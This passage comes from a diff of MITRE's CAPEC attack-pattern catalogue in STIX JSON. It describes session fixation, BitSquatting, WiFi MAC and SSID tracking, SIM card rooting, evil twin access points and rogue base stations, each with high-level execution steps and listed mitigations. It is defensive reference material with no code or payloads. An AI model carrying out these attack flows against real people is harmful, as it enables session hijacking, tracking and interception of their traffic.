  1. Attract a Victim: Fixate the session: The attacker now needs to transfer the session identifier from the trap session to the victim by introducing the session identifier into the victim's browser. This is known as fixating the session. The session identifier can be introduced into the victim's browser by leveraging cross site scripting vulnerability, using META tags or setting HTTP response headers in a variety of ways.

    2. Techniques
    Attackers can put links on web sites (such as forums, blogs, or comment forms).
    Attackers can establish rogue proxy servers for network protocols that give out the session ID and then redirect the connection to the legitimate service.
    Attackers can email attack URLs to potential victims through spam and phishing techniques.

Exploit

  1. Abuse the Victim's Session: Takeover the fixated session: Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the fixated session identifier.

    2. Techniques
    The attacker loads the predefined session ID into their browser and browses to protected data or functionality.
    The attacker loads the predefined session ID into their software and utilizes functionality with the rights of the victim.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Session identifiers that remain unchanged when the privilege levels change.", + "Permissive session management mechanism that accepts random user-generated session identifiers", + "Predictable session identifiers" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Only basic skills are required to determine and fixate session identifiers in a user's browser. Subsequent attacks may require greater skill levels depending on the attackers' motives." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a strict session management mechanism that only accepts locally generated session identifiers: This prevents attackers from fixating session identifiers of their own choice.", + "id": "course-of-action--b187831e-a53c-465d-b72f-49df78479e67", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-61-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0d553a19-deeb-45df-b70d-71110b119c7c", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b187831e-a53c-465d-b72f-49df78479e67", + "spec_version": "2.1", + "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.", + "id": "course-of-action--606914b1-f22c-4598-a173-6f4546572979", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-61-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad81b2e4-63b4-4d8e-9d96-4db93943afa2", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--606914b1-f22c-4598-a173-6f4546572979", + "spec_version": "2.1", + "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use session identifiers that are difficult to guess or brute-force: One way for the attackers to obtain valid session identifiers is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.", + "id": "course-of-action--8fc9e23c-7780-4d34-8bd6-01ec3f063b9c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-61-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6ee9dff-2bc5-4eae-a4d6-b3f868cb8569", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fc9e23c-7780-4d34-8bd6-01ec3f063b9c", + "spec_version": "2.1", + "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries inject data into mobile technology traffic (data flows or signaling data) to disrupt communications or conduct additional surveillance operations.", + "external_references": [ + { + "external_id": "CAPEC-610", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/610.html" + } + ], + "id": "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cellular Data Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Attackers can disrupt or deny mobile technology communications and operations.)", + "Modify Data (Attackers can inject false data into data or signaling system data flows of communications and operations, or re-route data flows or signaling data for the purpose of further data intercept and capture.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "High": "Often achieved by nation states in conjunction with commercial cellular providers to conduct cellular traffic intercept and possible traffic injection." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Commercial defensive technology to detect and alert to any attempts to modify mobile technology data flows or to inject new data into existing data flows and signaling data.", + "id": "course-of-action--24c2c0ad-9606-42ff-bdd0-8c0cb09d28a2", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-610-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4bbed6d4-6c57-4da2-ad62-002452b7960c", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24c2c0ad-9606-42ff-bdd0-8c0cb09d28a2", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name one bit different than a trusted domain. A BitSquatting attack leverages random errors in memory to direct Internet traffic to adversary-controlled destinations. BitSquatting requires no exploitation or complicated reverse engineering, and is operating system and architecture agnostic. Experimental observations show that BitSquatting popular websites could redirect non-trivial amounts of Internet traffic to a malicious entity.", + "external_references": [ + { + "external_id": "CAPEC-611", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/611.html" + }, + { + "description": "Artem Dinaburg, Bitsquatting: DNS Hijacking without exploitation, Raytheon", + "external_id": "REF-485", + "source_name": "reference_from_CAPEC", + "url": "http://media.blackhat.com/bh-us-11/Dinaburg/BH_US_11_Dinaburg_Bitsquatting_WP.pdf" + } + ], + "id": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "BitSquatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful BitSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.

    2. Techniques
    Research popular or high traffic websites.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the BitSquatted URL.

    2. Techniques
    Register the BitSquatted domain.

Exploit

  1. Wait for a user to visit the domain: Finally, the adversary simply waits for a user to be unintentionally directed to the BitSquatted domain.

    2. Techniques
    Simply wait for an error in memory to occur, redirecting the user to the malicious domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Authenticate all servers and perform redundant checks when using DNS hostnames.", + "id": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-611-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0d8b1972-e844-4991-a884-ca3e967a6e8d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "spec_version": "2.1", + "target_ref": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When possible, use error-correcting (ECC) memory in local devices as non-ECC memory is significantly more vulnerable to faults.", + "id": "course-of-action--cc9894cb-c83c-4f22-8ef6-9a2a3187b948", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-611-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--70115677-16f7-4e4f-9e75-85108f13258f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cc9894cb-c83c-4f22-8ef6-9a2a3187b948", + "spec_version": "2.1", + "target_ref": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively listens for WiFi messages and logs the associated Media Access Control (MAC) addresses. These addresses are intended to be unique to each wireless device (although they can be configured and changed by software). Once the attacker is able to associate a MAC address with a particular user or set of users (for example, when attending a public event), the attacker can then scan for that MAC address to track that user in the future.", + "external_references": [ + { + "external_id": "CAPEC-612", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/612.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--d49fca9f-7eb0-4c1b-b2e6-c27119e5268e", + "modified": "2019-04-04T00:00:00.000Z", + "name": "WiFi MAC Address Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "Open source and commercial software tools are available and several commercial advertising companies routinely set up tools to collect and monitor MAC addresses." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Automatic randomization of WiFi MAC addresses", + "id": "course-of-action--1a9dbae9-4209-42ff-bcb4-52af76ceb770", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-612-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ada034dd-bae1-45e0-992d-43931ede09d7", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a9dbae9-4209-42ff-bcb4-52af76ceb770", + "spec_version": "2.1", + "target_ref": "attack-pattern--d49fca9f-7eb0-4c1b-b2e6-c27119e5268e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequent changing of handset and retransmission device", + "id": "course-of-action--520b5a77-564b-4186-aadd-6e795b0bb798", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-612-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42428530-f329-4129-baf4-f136e130d080", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--520b5a77-564b-4186-aadd-6e795b0bb798", + "spec_version": "2.1", + "target_ref": "attack-pattern--d49fca9f-7eb0-4c1b-b2e6-c27119e5268e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.", + "external_references": [ + { + "external_id": "CAPEC-613", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/613.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "modified": "2019-09-30T00:00:00.000Z", + "name": "WiFi SSID Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "Open source and commercial software tools are available and open databases of known WiFi SSID addresses are available online." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not enable the feature of \"Hidden SSIDs\" (also known as \"Network Cloaking\") – this option disables the usual broadcasting of the SSID by the access point, but forces the mobile handset to send requests on all supported radio channels which contains the SSID. The result is that tracking of the mobile device becomes easier since it is transmitting the SSID more frequently.", + "id": "course-of-action--5f1ca11f-4c92-41c1-84e6-0f6af4787884", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-613-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--54e6bbee-8421-4ac9-ab72-d13af56bbbca", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f1ca11f-4c92-41c1-84e6-0f6af4787884", + "spec_version": "2.1", + "target_ref": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequently change the SSID to new and unrelated values", + "id": "course-of-action--22c53c7d-593e-4ede-b12d-dad35f67f7e3", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-613-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7cf4d3c7-8a07-460e-866b-2475c9ee85bb", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22c53c7d-593e-4ede-b12d-dad35f67f7e3", + "spec_version": "2.1", + "target_ref": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "SIM cards are the de facto trust anchor of mobile devices worldwide. The cards protect the mobile identity of subscribers, associate devices with phone numbers, and increasingly store payment credentials, for example in NFC-enabled phones with mobile wallets. This attack leverages over-the-air (OTA) updates deployed via cryptographically-secured SMS messages to deliver executable code to the SIM. By cracking the DES key, an attacker can send properly signed binary SMS messages to a device, which are treated as Java applets and are executed on the SIM. These applets are allowed to send SMS, change voicemail numbers, and query the phone location, among many other predefined functions. These capabilities alone provide plenty of potential for abuse.", + "external_references": [ + { + "external_id": "CAPEC-614", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/614.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "description": "Karsten Nohl, Rooting SIM Cards, Security Research Labs", + "external_id": "REF-486", + "source_name": "reference_from_CAPEC", + "url": "https://srlabs.de/rooting-sim-cards/" + } + ], + "id": "attack-pattern--b974175d-c76a-4168-af55-ea0cb0695286", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Rooting SIM Cards", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "A SIM card that relies on the DES cipher." + ], + "x_capec_skills_required": { + "Medium": "This is a sophisticated attack, but detailed techniques are published in open literature." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Upgrade the SIM card to use the state-of-the-art AES or the somewhat outdated 3DES algorithm for OTA.", + "id": "course-of-action--49c4d0f1-127a-4f39-943e-6ee56dcac7d2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-614-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73c5c39c-480b-411a-8be5-0ffe26aedee8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49c4d0f1-127a-4f39-943e-6ee56dcac7d2", + "spec_version": "2.1", + "target_ref": "attack-pattern--b974175d-c76a-4168-af55-ea0cb0695286", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries install Wi-Fi equipment that acts as a legitimate Wi-Fi network access point. When a device connects to this access point, Wi-Fi data traffic is intercepted, captured, and analyzed. This also allows the adversary to use \"adversary-in-the-middle\" (CAPEC-94) for all communications.", + "external_references": [ + { + "external_id": "CAPEC-615", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/615.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--bc008240-e0e0-4b97-9dbd-ffaba4c519b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Evil Twin Wi-Fi Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control Wi-Fi data communications to/from mobile device.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Hardware" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Commercial defensive technology that monitors for rogue Wi-Fi access points, adversary-in-the-middle attacks, and anomalous activity with the mobile device baseband radios.", + "id": "course-of-action--3cd5d16f-646e-42e0-b22d-2a14d4bec7b1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-615-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6566c16f-35b1-476c-b9e5-0399cc905c82", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3cd5d16f-646e-42e0-b22d-2a14d4bec7b1", + "spec_version": "2.1", + "target_ref": "attack-pattern--bc008240-e0e0-4b97-9dbd-ffaba4c519b5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary provides a malicious version of a resource at a location that is similar to the expected location of a legitimate resource. After establishing the rogue location, the adversary waits for a victim to visit the location and access the malicious resource.", + "external_references": [ + { + "external_id": "CAPEC-616", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/616.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Masquerading: Match Legitimate Name or Location", + "external_id": "T1036.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/005" + } + ], + "id": "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Establish Rogue Location", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Successful attacks of this nature can result in a wide variety of consequences and negatively impact confidentiality and integrity based on the adversary's subsequent actions.)" + ], + "Integrity": [ + "Other (Successful attacks of this nature can result in a wide variety of consequences and negatively impact confidentiality and integrity based on the adversary's subsequent actions.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--ef205569-ee34-491a-b773-5c023e2c1680", + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--bc008240-e0e0-4b97-9dbd-ffaba4c519b5", + "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "attack-pattern--e3dd79e7-307b-42dd-9e22-d0345c0ec001" + ], + "x_capec_prerequisites": [ + "A resource is expected to available to the user." + ], + "x_capec_skills_required": { + "Low": "Adversaries can often purchase low-cost technology to implement rogue access points." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker imitates a cellular base station with their own \"rogue\" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. the retransmission device) to talk to the rogue base station.", + "external_references": [ + { + "external_id": "CAPEC-617", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/617.html" + } + ], + "id": "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cellular Rogue Base Station", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + 